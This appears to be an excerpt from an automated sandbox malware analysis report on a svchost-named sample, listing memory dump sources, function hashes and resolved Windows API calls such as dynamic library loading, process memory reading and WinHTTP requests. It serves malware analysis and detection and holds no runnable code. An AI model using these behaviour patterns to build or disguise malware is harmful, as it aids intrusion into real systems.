          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_time64$AddressLibraryLoadProcmemset
          • String ID:
          • API String ID: 4044016582-0
          • Opcode ID: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
          • Instruction ID: 1ff008e7178ffe5c36afa01dae6893e19bf73e557f2170abeac8c26d8b64783f
          • Opcode Fuzzy Hash: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
          • Instruction Fuzzy Hash: 68F14672200B80C6EB52DF1AD4943EA37A5F788BC5F15812AEB8E9B7A5DF35C485C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: memset
          • String ID: @
          • API String ID: 2221118986-2766056989
          • Opcode ID: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
          • Instruction ID: 3b6190bc3fad717221f5bbcce2ae25d4d52b3cf8b168bce159151464274ee265
          • Opcode Fuzzy Hash: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
          • Instruction Fuzzy Hash: 15021836610B8485EB62DF26E8907EA67A0F78CBC8F44412AEF8D47B69DF39C154C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_time64$FileSleepTime
          • String ID:
          • API String ID: 2289066803-0
          • Opcode ID: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
          • Instruction ID: 1ab422d41cd114fbfdff5d5c6448fbea51a6bf4249b6e681b0e7df56046467f6
          • Opcode Fuzzy Hash: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
          • Instruction Fuzzy Hash: DFF18B76200B8586EB61DF26E8543EE37A4F789BC8F408126EB8D47BA5CF39C549D740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
          • String ID:
          • API String ID: 3266983031-0
          • Opcode ID: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
          • Instruction ID: 6ca92d44798bfbdcd13931f1ba461a477904d21d6d181f3beb0808d86e954708
          • Opcode Fuzzy Hash: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
          • Instruction Fuzzy Hash: C3319275104B4486EB629B16F8843DAB3A4F78C7D4F50411AEB8D47B79DF79C658C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AllocMemoryProcessVirtualWritelstrlen
          • String ID:
          • API String ID: 2980677570-0
          • Opcode ID: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
          • Instruction ID: 2dab337ee8d68b7cc9e8264ef1f707780b607853232d03d74ae5f575a22fd722
          • Opcode Fuzzy Hash: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
          • Instruction Fuzzy Hash: 92814632215B8186E7A28B12E84479BB7A4F78CBD4F044129EFCD87BA5EF38C545CB00
          APIs
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBE9
            • Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
            • Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
            • Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E
            • Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB3C
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB56
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB74
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB96
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBB0
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBCA
            • Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25
            • Part of subcall function 000000014000BF10: HeapFree.KERNEL32(?,?,?,?,?,000000014000247B,?,?,?,00000001400023F7), ref: 000000014000BFA0
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$Free$AddressProc$AllocateProcess$LibraryLoadMemoryRead
          • String ID:
          • API String ID: 2491122006-0
          • Opcode ID: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
          • Instruction ID: 68c8fbabcff802c526084c53bb8964246dfaaeb998f36def65cd26f4996e6266
          • Opcode Fuzzy Hash: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
          • Instruction Fuzzy Hash: 3AA145B2301B4085FB52DF67E4603EA33A5F788BD8F048529AF5857BA9DF34C845A750
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AddressFileLibraryLoadProcRead
          • String ID:
          • API String ID: 387921010-0
          • Opcode ID: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
          • Instruction ID: cba2ec3feea0474adde51f7879ad5c737c0c375ffbddc39dfdd9f5c2093ba4f8
          • Opcode Fuzzy Hash: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
          • Instruction Fuzzy Hash: 56D15C32604B9586EB21CF66E8503EA77A0F788BC8F544126EF8D4BBA9DF39C545C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
          • String ID:
          • API String ID: 2238110293-0
          • Opcode ID: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
          • Instruction ID: 24ed72427a13ddd5fcc77b1a0f8ca7dcc51255d65edbd16390ea418555290099
          • Opcode Fuzzy Hash: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
          • Instruction Fuzzy Hash: B4E15CB6201B8486EB62DF16E8507EA77A0FB89BC8F444025EF4E47B69DF39C545C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap$??3@
          • String ID:
          • API String ID: 3062846050-0
          • Opcode ID: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
          • Instruction ID: 567a171887cd63558544f340f6ae29d700814bafcf893e5afe614293ba1669bb
          • Opcode Fuzzy Hash: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
          • Instruction Fuzzy Hash: B3D14D76201A8186EB62DF26E8503EE67A1F78CBC8F144125EF8E57B69DF39C549C700
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeStringtolower$_wtoi
          • String ID: mcco$mcco$run
          • API String ID: 3767767869-3413444080
          • Opcode ID: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
          • Instruction ID: 16d87dde47dbfec4f71874680f490213c2a4b8fef5ea2d831d7f44a55ef8ae21
          • Opcode Fuzzy Hash: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
          • Instruction Fuzzy Hash: 429148B6601A918AEB22DF32E4907EE37B1F749BDDF145115EF4A17A68CB36C885C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$CloseHandleHttp$??3@
          • String ID:
          • API String ID: 3500024125-0
          • Opcode ID: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
          • Instruction ID: 7c82ee3f3e0be60d7d2ee0712700461a8a45a917594ce0937cf0833207fb0a1d
          • Opcode Fuzzy Hash: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
          • Instruction Fuzzy Hash: F251E4B5600B8581EA86DB57E8543EA23A0FB8DFD5F04401AEF8D57776CE39C885C380
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
          • Instruction ID: 5bbe0f4e1f777998957cbe3a4eb7b9395ba18578963b24f341d411ea742c8042
          • Opcode Fuzzy Hash: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
          • Instruction Fuzzy Hash: 22D15E36214A9586EB52DF26E8503EE67A0FB8DBC8F144015FF8A4BB68DF7AC545C700
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
          • String ID: 2)
          • API String ID: 1140403012-1274239105
          • Opcode ID: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
          • Instruction ID: c866e5fc1bbb2455b780a7f5f5a0285e187b55cd79e2f29ec521d05873807281
          • Opcode Fuzzy Hash: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
          • Instruction Fuzzy Hash: 90516C72204B8186EB65CF26F850BAA73A0F78CB84F145116EF8987B68DB39C555CB90
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: String$Free$??3@Alloc$??2@Heap
          • String ID:
          • API String ID: 3556069409-0
          • Opcode ID: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
          • Instruction ID: c0ef10fccdeb6daa0a0422ac56e41beaac227df42e421e6682d1b4ce94b3c9bf
          • Opcode Fuzzy Hash: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
          • Instruction Fuzzy Hash: CAA17E75305A8086EA62EF12B8143EB23A5FB8DBCAF144515AF4E0B7A8EF39C541C750
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: String$Free$Alloc$Heapmemcpymemset
          • String ID:
          • API String ID: 611701654-0
          • Opcode ID: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
          • Instruction ID: 1bf9e857b8df484256096c26ec551cdfd3ef17b886eb789306359d79b8ec2ccb
          • Opcode Fuzzy Hash: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
          • Instruction Fuzzy Hash: C7914E32214AD186EB628F13E8503EA77A0FB8DBC8F449055FB8A4B765DF7AC546C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$??2@String_time64memset$??3@Alloc
          • String ID:
          • API String ID: 2204789691-0
          • Opcode ID: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
          • Instruction ID: d9dbd6d1c3e7fa4b14e618689f3d3978398575ef73f47ae2eb561969472c8340
          • Opcode Fuzzy Hash: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
          • Instruction Fuzzy Hash: 29812872205B8586EA62EF12E8503EA63A5F7CDBC5F040029EF8D4B7A5DF3AC955C740
          APIs
          • WinHttpQueryDataAvailable.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA23
          • RtlReAllocateHeap.NTDLL ref: 000000014000DBA1
          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA74
          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA96
          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DAD9
          • WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DBDF
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressDataHttpProc$AllocateAvailableHeapLibraryLoadQueryReadmemcpymemset
          • String ID:
          • API String ID: 2116122043-0
          • Opcode ID: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
          • Instruction ID: dcb2aa4c958721db2a120c4ea9a07c4cdbbbd9df540347d3848d8a894ea84299
          • Opcode Fuzzy Hash: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
          • Instruction Fuzzy Hash: 9D512672305B8486EA62CB17E8443DAB7A5B78CBC4F448126AF8D4B769EF7CC445C750
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$freeaddrinfo$AddressCleanupLibraryLoadProcStartup
          • String ID:
          • API String ID: 4167984890-0
          • Opcode ID: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
          • Instruction ID: 1f05485aafd538e14a92043d9081f1b9a7aae193132c0cc0b42c540dcab88815
          • Opcode Fuzzy Hash: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
          • Instruction Fuzzy Hash: DF716A76201BC185EB62DF62E8943EA23A1FB8EBC8F444115EB8E47B65DF38C545C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$HeapLibraryLoad$AllocateFileModuleNameProcessmemcpymemset
          • String ID:
          • API String ID: 2956276425-0
          • Opcode ID: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
          • Instruction ID: fe1601f0d561c1644e1890eb6a4d3931ee81d1573273c71cbb6c5fd60530c169
          • Opcode Fuzzy Hash: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
          • Instruction Fuzzy Hash: 00411471201B8585EA62DB12E8443D963A4FB8CBC4F584529EB8D07B79EF78C949C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
          • Instruction ID: aed83f4b948c4985c135c6fbceb64c6b8094804d589bec6b40d7a8f706b6a698
          • Opcode Fuzzy Hash: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
          • Instruction Fuzzy Hash: 5DC14F76614B9186EB62DF26D8503EE7760FB88BC8F144015EB8E4BBA8DF79C545C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memcpy
          • String ID:
          • API String ID: 1887603139-0
          • Opcode ID: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
          • Instruction ID: ed98ba6ede692f367d8fff878989292d2ab0398e512eb47c8f97488a2b74d39a
          • Opcode Fuzzy Hash: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
          • Instruction Fuzzy Hash: 7051BCB2600BC481F752CF66E8007EA23A4FB8ABCCF058119EF8D17676DF3885858740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeString
          • String ID:
          • API String ID: 3341692771-0
          • Opcode ID: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
          • Instruction ID: dd41a748227c6243df9798e51560345f6e40f6322dbc4b2b080599702ec169ce
          • Opcode Fuzzy Hash: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
